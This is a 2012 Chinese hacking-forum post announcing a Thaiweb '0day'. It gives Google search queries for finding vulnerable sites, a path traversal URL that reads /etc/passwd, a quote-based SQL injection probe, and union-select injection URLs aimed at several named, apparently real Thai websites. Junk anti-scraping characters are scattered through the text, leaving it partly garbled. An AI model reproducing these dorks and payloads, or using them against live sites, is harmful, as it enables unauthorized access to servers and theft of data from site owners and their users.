找回密码
 立即注册
查看: 2770|回复: 0
打印 上一主题 下一主题

Thaiweb远程文件sql注入漏洞0day

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-27 08:38:39 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Google之:: O- i5 z- c; u& _0 _' M
% Z$ r6 Z5 |: J" O9 W
intext:powered by Thaiweb
& {$ a: J/ N4 H+ v9 [+ W: r9 O1 t6 N+ Y" D& c0 c
inurl:index.php?page=board.php
- h5 A. U" Q. G+ E7 m' r: N* ~! J' C, S8 D6 f5 C
6 {/ r; J% k; @7 S1 i4 a4 S9 l: F
1 Q5 D5 F  d. e+ v. z
利用点1:http://www.xfack.com/index.php?p ... ../../../etc/passwd* {( r6 Q* ?5 g# `' F6 k: X$ q

1 q8 B) x: C! c; V0 o
; G( N: ?! k4 f8 e
7 i% m( |* W6 H利用点2:http://www.xfack.com/index.php?page=boardque.php&bod_id=4'
2 M! D' H1 i. N/ h+ C3 G' g
" z" t2 t4 }9 U# N6 K/ }0 Y" a ! K6 Q. q; y2 t* C

* e! n/ Q8 }( mhttp://www.keytasin.com//index.p ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--8 C% ?* c5 p1 t; \

" n: p& C, z3 q' Z$ N' Shttp://www.autopartnerthailand.c ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--7 x* T0 j* r* F: x

: K/ C' U  m: U* W3 ]http://gift.in.th/index.php?page ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--1 i6 X5 z, }# |' V6 `& ?: f7 T: H7 m9 X
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表